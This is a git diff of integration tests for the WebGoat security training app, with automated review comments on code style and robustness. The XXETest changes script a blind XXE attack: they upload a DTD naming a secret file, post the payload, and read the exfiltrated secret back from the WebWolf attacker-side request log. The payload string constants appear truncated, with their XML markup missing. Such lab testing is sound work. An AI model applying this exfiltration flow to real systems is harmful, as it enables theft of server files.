diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java
index d896b1c80..4089e3b77 100644
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java
+++ b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java
@@ -3,6 +3,7 @@ package org.owasp.webgoat;
import io.restassured.RestAssured;
import io.restassured.config.RestAssuredConfig;
import io.restassured.config.SSLConfig;
+import io.restassured.http.ContentType;
import lombok.Getter;
import org.hamcrest.CoreMatchers;
import org.junit.After;
@@ -210,7 +211,8 @@ public abstract class IntegrationTest {
.config(restConfig)
.cookie("JSESSIONID", getWebGoatCookie())
.get(url("service/lessonoverview.mvc"))
- .then()
+ .then()
+ .log().all()
.statusCode(200).extract().jsonPath().getList("solved"), CoreMatchers.everyItem(CoreMatchers.is(true)));
Assert.assertThat(RestAssured.given()
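Review bot: The `.log().all()` added to `checkResults` dumps the full `lessonoverview.mvc` response body into the build log on every call, including the successful runs, which makes the integration-test output noisy and looks like a leftover debugging aid rather than a deliberate diagnostic. RestAssured's `.log().ifValidationFails()` gives the same detail only when the subsequent `statusCode(200)` or the assertion fails, so `.then().log().ifValidationFails()` would keep the log quiet without losing the information when it matters. If the full dump is intended, a one-line comment saying so (`// log every response: overview output is short and useful in CI logs`) would stop the next reader from removing it.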
@@ -222,4 +224,20 @@ public abstract class IntegrationTest {
.statusCode(200).extract().jsonPath().getList("assignment.path"), CoreMatchers.everyItem(CoreMatchers.startsWith(prefix)));
}
+
+ public void checkAssignment(String url, ContentType contentType, String body, boolean expectedResult) {
+ Assert.assertThat(
+ RestAssured.given()
+ .when()
+ .config(restConfig)
+ .contentType(contentType)
+ .cookie("JSESSIONID", getWebGoatCookie())
+ .body(body)
+ .post(url)
+ .then()
+ .statusCode(200)
+ .extract().path("lessonCompleted"), CoreMatchers.is(expectedResult));
+ }
+
}
+
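Review bot: The new public helper `checkAssignment` has no Javadoc, although it is the assertion every lesson test in this module will go through now that the copy in `XXETest` has been removed. Its contract — POST `body` with `contentType` and the WebGoat session cookie, require HTTP 200, then compare the JSON `lessonCompleted` field with `expectedResult` — is worth stating above the signature, e.g. `/** Posts {@code body} with the given content type to {@code url} using the WebGoat session and asserts the response is 200 with {@code lessonCompleted} equal to {@code expectedResult}. */`. Note also that `extract().path("lessonCompleted")` returns `Object`, so the `CoreMatchers.is(expectedResult)` comparison relies on the field being a JSON boolean; a short comment to that effect would explain why a `Boolean` parameter and not a string is used.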
diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java
index ab6e3350c..86f2eb56c 100644
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java
+++ b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java
@@ -5,8 +5,6 @@ import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
-import org.hamcrest.CoreMatchers;
-import org.junit.Assert;
import org.junit.Test;
import io.restassured.RestAssured;
@@ -16,7 +14,7 @@ public class XXETest extends IntegrationTest {
private static final String xxe3 = "]>&xxe;test";
private static final String xxe4 = "]>&xxe;test";
- private static final String dtd7 = "\">%all;";
+ private static final String dtd7 = "\">%all;";
private static final String xxe7 = "%remote;]>test&send;";
private String webGoatHomeDirectory = System.getProperty("user.dir").concat("/target/.webgoat");
@@ -28,15 +26,33 @@ public class XXETest extends IntegrationTest {
startLesson("XXE");
checkAssignment(url("/WebGoat/xxe/simple"),ContentType.XML,xxe3,true);
+
checkAssignment(url("/WebGoat/xxe/content-type"),ContentType.XML,xxe4,true);
- Path webWolfFilePath = Paths.get(webwolfFileDir);
+
+
+
+ checkAssignment(url("/WebGoat/xxe/blind"),ContentType.XML,""+getSecret()+"",true );
+
+ checkResults("xxe/");
+
+ }
+
+ /**
+ * This performs the steps of the exercise before the secret can be committed in the final step.
+ * @return
+ * @throws IOException
+ */
+ private String getSecret() throws IOException {
+
+ //remove any left over DTD
+ Path webWolfFilePath = Paths.get(webwolfFileDir);
if (webWolfFilePath.resolve(Paths.get(getWebgoatUser(),"blind.dtd")).toFile().exists()) {
- System.out.println("delete file");
Files.delete(webWolfFilePath.resolve(Paths.get(getWebgoatUser(),"blind.dtd")));
}
String secretFile = webGoatHomeDirectory.concat("/XXE/secret.txt");
- String dtd7String = dtd7.replace("WEBWOLFURL", webWolfUrl("")).replace("SECRET", secretFile);
- System.out.println(dtd7String);
+ String dtd7String = dtd7.replace("WEBWOLFURL", webWolfUrl("/landing")).replace("SECRET", secretFile);
+
+ //upload DTD
RestAssured.given()
.when()
.config(restConfig)
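Review bot: The "remove any left over DTD" step in `getSecret()` uses a check-then-delete pair (`toFile().exists()` followed by `Files.delete`) where `Files.deleteIfExists` does the same thing in one call without the race or the `File` round-trip: `Files.deleteIfExists(webWolfFilePath.resolve(Paths.get(getWebgoatUser(), "blind.dtd")));`. The Javadoc on `getSecret()` also leaves its `@return` tag empty; since the helper's body continues into the next hunk and ends by reading the WebWolf request log, something like `@return the secret string recovered from the WebWolf request log` would make the helper's purpose clear from the summary alone. The upload statement started at the end of this hunk is completed in the next one.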
@@ -46,28 +62,20 @@ public class XXETest extends IntegrationTest {
.then()
.extract().response().getBody().asString();
-
- String xxe7String = xxe7.replace("WEBWOLFURL", webWolfUrl("/WebWolf/files")).replace("USERNAME", getWebgoatUser());
- System.out.println(xxe7String);
+ //upload attack
+ String xxe7String = xxe7.replace("WEBWOLFURL", webWolfUrl("/files")).replace("USERNAME", getWebgoatUser());
checkAssignment(url("/WebGoat/xxe/blind?send=test"),ContentType.XML,xxe7String,false );
- //checkResults("/XXE/");
-
- }
-
- public void checkAssignment(String url, ContentType contentType, String body, boolean expectedResult) {
- Assert.assertThat(
- RestAssured.given()
- .when()
- .config(restConfig)
- .contentType(contentType)
- .cookie("JSESSIONID", getWebGoatCookie())
- .body(body)
- .post(url)
- .then()
- .log().all()
- .statusCode(200)
- .extract().path("lessonCompleted"), CoreMatchers.is(expectedResult));
+ //read results from WebWolf
+ String result = RestAssured.given()
+ .when()
+ .config(restConfig)
+ .cookie("WEBWOLFSESSION", getWebWolfCookie())
+ .get(webWolfUrl("/WebWolf/requests"))
+ .then()
+ .extract().response().getBody().asString();
+ result = result.substring(result.lastIndexOf("WebGoat 8.0 rocks... ("),result.lastIndexOf("WebGoat 8.0 rocks... (")+33);
+ return result;
}
}
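Review bot: The extraction at the end of `getSecret()` calls `result.lastIndexOf("WebGoat 8.0 rocks... (")` twice and substrings with a hard-coded `+33`; if the marker is absent (blind request never reached WebWolf) `lastIndexOf` returns -1 and `substring(-1, 32)` throws a `StringIndexOutOfBoundsException`, so the test fails with an index error instead of saying that the out-of-band call was not received. Checking the marker once makes the failure self-explanatory: `int start = result.lastIndexOf("WebGoat 8.0 rocks... (");` / `if (start < 0) throw new AssertionError("secret not found in WebWolf requests");` / `return result.substring(start, start + 33);` (the commit removed the `org.junit.Assert` import, so a plain `AssertionError` avoids re-adding it). The `33` should also be commented with what it covers, since it is tied to the exact format of the secret text written by the lesson. The DTD upload whose trailing `.then().extract()...asString()` opens this hunk has no `.statusCode(...)` check, so a failed upload would only surface later as the missing marker; that statement begins in the previous hunk.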
diff --git a/webgoat-integration-tests/src/test/resources/application-inttest.properties b/webgoat-integration-tests/src/test/resources/application-inttest.properties
index 9c388c7ca..4286e914f 100644
--- a/webgoat-integration-tests/src/test/resources/application-inttest.properties
+++ b/webgoat-integration-tests/src/test/resources/application-inttest.properties
@@ -1,6 +1,10 @@
+#In order to run tests a known temp directory is preferred
+#that is why these values are used
+
webgoat.user.directory=${user.dir}/target/.webgoat
webgoat.server.directory=${user.dir}/target/.webgoat
-
webwolf.fileserver.location=${user.dir}/target/webwolf-fileserver
-spring.jpa.hibernate.ddl-auto=create-drop
\ No newline at end of file
+#database will get deleted for every mvn clean install
+#as these extra properties are read by WebGoat and WebWolf the drop of the tables
+#was not helpful.
\ No newline at end of file
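Review bot: Dropping `spring.jpa.hibernate.ddl-auto=create-drop` means the test profile now relies on the database file under `${user.dir}/target/.webgoat` being removed by `mvn clean` rather than on Hibernate recreating the schema; a run without `clean` would presumably start from the previous run's state, including lessons already marked solved, which would make a `checkResults` assertion pass without the test having solved anything — worth confirming and stating explicitly. The explanatory comment is also hard to follow; a clearer version would be `#The database lives under target/ and is removed by mvn clean, so the schema is not dropped here: both WebGoat and WebWolf read this file, and create-drop made them drop each other's tables.` (assuming that is the failure that motivated the change). The file still ends without a trailing newline, which some tools flag.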